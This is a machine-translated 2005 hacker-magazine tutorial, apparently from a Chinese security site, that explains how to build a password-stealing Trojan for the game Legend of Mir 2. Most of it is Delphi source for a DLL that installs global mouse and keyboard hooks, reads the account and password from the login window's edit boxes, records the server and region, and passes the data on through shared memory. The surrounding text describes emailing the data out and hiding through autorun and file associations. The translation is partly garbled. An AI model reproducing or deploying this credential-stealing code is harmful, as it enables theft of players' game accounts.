The legendary Trojan DIY-vulnerability warning-the black bar safety net

ID MYHACK58:6220053714
Type myhack58
Reporter 佚名
Modified 2005-10-16T00:00:00


Note: this article has been published in thehackerthe defense of 2 0 0 5 years the first 3 periods, the copyright of all its

Network on the legendary Trojans a common occurrence, a service end even sold to hundreds of yuan, and the source code is a few thousand dollars or even higher price to sell. Why is the price so high? Because of the legendary Trojan horse to achieve the steal region, Server, character equipment, etc. of the information effect, is not just a simple Keylogger, sometimes also need to use memorysearch, network packet sniffing and other techniques, so the write-up relatively a bit difficult, but this does not mean that the preparation of the legendary Trojan horse of technology is how hard it is. Today I will to parse parse, explain how to prepare the legendary Trojan horse, and hope to borrow the analysis of this Trojan horse functionality implemented and game manufacturers can prevent such hacking, so the majority of the game enthusiasts truly have a pure game space.

We have thisprogramhas the following features: get the“ legend”game login information: area code, login account, password, server name, and sent to the specified mailbox. Set autorun key value, this Trojan server start with the system and has been running, if at the same time set up the Association to start, then get a information after that close your own, and with the“legend”game started again. Set the Association, the machine after startup, the Trojan is not running, and only running a“legends”game when Trojans it will with the start, so you can enhance the point of invisibility.

Again to remind everyone, this article main purpose is to uncover the worth of the higher of the legendary Trojan horse of the veil, and set forth in the interception area and server information programming method, so not adding the interception of the characters occupation, level, portable equipment function, but also didn't join for the protection of its own-driven programming as well as rootkit technology, the interest and effort of the friends can add it yourself. Well, the following formal entry into the fascinating code world critical code are annotated, the full code see the disc: the

Get“legend”password, region, Server main code

unit unitHook;

interface ...... function EnableHook:Boolean;stdcall //effective hooksprocedure function DisableHook:Boolean;stdcall; //invalid hookprocedure ...... implementation ...... //Enumerate the sub-form's callback function function EnumChildWindowsProc(hChild: HWnd): Boolean; stdcall; var szClassName: array[0..2 5 5] of char; begin Result := True; //set to True it will then find the next GetClassName(hChild, szClassName, 2 5 5); if StrPas(szClassName)='TEdit' then begin inc(numEdit); if numEdit=1 then hEdit2:= hChild //password else if numEdit=2 then hEdit1:= hChild //account end; end;

//Get password procedure GetPassword; var ss,ID,PW:string; begin numEdit:=0;//identify the TEdit controls the number of EnumChildWindows(hActiv, @EnumChildWindowsProc, 0);//enumerate the controls if numEdit=2 then begin ID:=trim(GetCaption(hEdit1)); PW:=trim(GetCaption(hEdit2)); if (ID<>")and(PW<>") then begin nNext:=3; ss:=Format('account=%s,password=%s',[ID,PW])+' '+FormatDateTime('yyyy-mm-dd hh:nn:ss',Now); StrCopy(@pShMem^. Text,PChar(ss)); PostMessage(pShMem^. hMainWnd, WM_MOUSEPT, 2, 2); //notification end; end; end;

//Get the server name procedure GetServerName; const x1=3 1 0;x2=4 7 7; y1=1 4 4; d=3; //server name button spacer step=4 2; //server name button step size var P : TPoint; yy, n1, n2 : integer; IniFileName, Ident, ss : string; begin GetCursorPos(P); //get the current mouse coordinates if (p. X<x1) or (p. X>x2) or (p. Y<y1) then exit; //mouse click not in the server name area.

yy:=p. Y-y1; n1:=yy div step; n2:=(yy+d) div step; if n1=n2 then inc(n1) else n1:=0;

if n1=0 then exit; //mouse click not server name

IniFileName:=ExtractFilePath(ParamStr(0))+'ftp.ini'; Ident:='server'+IntToStr(n1)+'caption'; ss:=ReadStringFromIniFile(IniFileName,Ident); if ss<>" then begin

ss:=ss+' '+FormatDateTime('yyyy-mm-dd hh:nn:ss',Now); StrCopy(@pShMem^. Text,PChar('Server='+ss)); //PostMessage(pShMem^. hMainWnd, WM_MOUSEPT, 2, 2); //notification PostMessage(pShMem^. hMainWnd, WM_MOUSEPT, 1 0, 2); //notification information,and send feedback end; end;

//Mouse hook procedure, is determined by the mouse action to decide writetotxt //Parameter is a hook code, The wParam of the mouse message number and the lParam points to a MOUSEHOOKSTRUCT contains about the mouse event information function MouseHookPro(iCode:integer; wParam:wparam; lParam:lparam): LResult;stdcall;export; var hControl : HWND; WinClass, WinText, ss : string; P:TPoint; rcWin:TRect; begin if (iCode=HC_ACTION) and (wParam=WM_LBUTTONUP) then begin//if the mouse click Message hActiv:=GetActiveWindow; WinClass:=GetClass(hActiv); if Uppercase(WinClass)='TFRMMAIN' then begin WinText:=GetCaption(hActiv); if WinText='legend client' then begin hControl:=FindWindowEx(hActiv,0,'TComboBox',nil); if hControl<>0 then begin //is the area code selection window GetWindowRect(hActiv,rcWin); P. X:= PMouseHookStruct(lParam)^. pt. X - rcWin. Left; P. Y:= PMouseHookStruct(lParam)^. pt. Y - rcWin. Top; if(P. X>=2 0 0)and(P. X<=2 8 0)and(P. Y>=3 4 8)and(P. Y<=3 8 0)then begin//the“Confirm”button ss:='code='+GetCaption(hControl)+' '+FormatDateTime('yyyy-mm-dd hh:nn:ss',Now); StrCopy(@pShMem^. Text,PChar(ss)); PostMessage(pShMem^. hMainWnd, WM_MOUSEPT, 2, 2); //notification end; end; end else if WinText='legend of mir2' then begin if nNext=3 then begin GetServerName; //get the server name,and the lower section of the order can not be reversed nNext:=0; end;

P:=PMouseHookStruct(lParam)^. pt; if(P. X>=4 2 1)and(P. X<=5 0 1)and(P. Y>=3 3 6)and(P. Y<=3 7 1)then //[submit]button GetPassword; //fetch the password,and the on period of the order can not be reversed

end; end; end;

Result:=CallNextHookEx(mousehook,iCode,wParam,lParam); end;

//Keyboard hook, wParam key ASCII code function KeyboardHookPro(iCode: Integer; wParam: WPARAM; lParam: LPARAM): LRESULT; stdcall; export; var WinClass, WinText : string; begin if (iCode=HC_ACTION) and ((lParam and $8 0 0 0 0 0 0 0)=0) and //$8 0 0 0 0 0 0 0 keyboard mask constants (wParam=$0D) then begin //$0D Enter key hActiv:=GetActiveWindow; WinClass:=GetClass(hActiv); WinText:=GetCaption(hActiv); if (Uppercase(WinClass)='TFRMMAIN')and(WinText='legend of mir2') then begin GetPassword;//get password end; end;

Result := CallNextHookEx(keyboardhook, iCode, wParam, lParam); end;

//Effective hooksprocedure function EnableHook:boolean;stdcall;export; begin if mousehook=0 then mousehook:=SetWindowsHookEx(wh_mouse,MouseHookPro,HInstance,0);//mouse hook if keyboardhook=0 then keyboardhook:=SetWindowsHookEx(wh_keyboard,KeyboardHookPro, hinstance,0);//keyboard hook

Result:=(mousehook<>0)and(keyboardhook<>0); end;

//Invalid hookprocedure

function DisableHook:boolean;stdcall;export; begin if mousehook<>0 then if UnHookWindowsHookEx(mousehook) then mousehook:=0;//mouse hook if keyboardhook<>0 then if UnHookWindowsHookEx(keyboardhook) then keyboardhook:=0;//keyboard hook Result:=(mousehook=0)and(keyboardhook=0); end;

initialization {If the map file already exists then open} hMappingFile := OpenFileMapping(FILE_MAP_WRITE, False, MappingFileName); if hMappingFile = 0 then {Create map file} hMappingFile := CreateFileMapping($FFFFFFFF, nil,PAGE_READWRITE, 0, SizeOf(TShareMem), PChar(MappingFileName)); if hMappingFile <> 0 then begin {Handle pShMem point to the Map File address} pShMem := PShareMem(MapViewOfFile(hMappingFile,FILE_MAP_WRITE,0,0,0)); if pShMem = nil then begin CloseHandle(hMappingFile); MessageBox(0,'can not establish a shared memory!',", 0); exit; end; end;

mousehook:=0; keyboardhook:=0; nNext:=0;

the finalization of the UnMapViewOfFile(pShMem); CloseHandle(hMappingFile);


Due to space reasons, the author in the text only tells about the interception of“legendary”game user name, password, region, server, and other information of the key code on the signal portion and the self-protection, modifying the registry and the file Association code will not here detail, the complete code has been Defense on the optical disc, and has been equipped with detailed notes, interested friends can see, hopefully the game manufacturers will join the anti-Trojan technology that enables you the player is no longer affected by the Trojan of the bitter, shun wish the players play happy.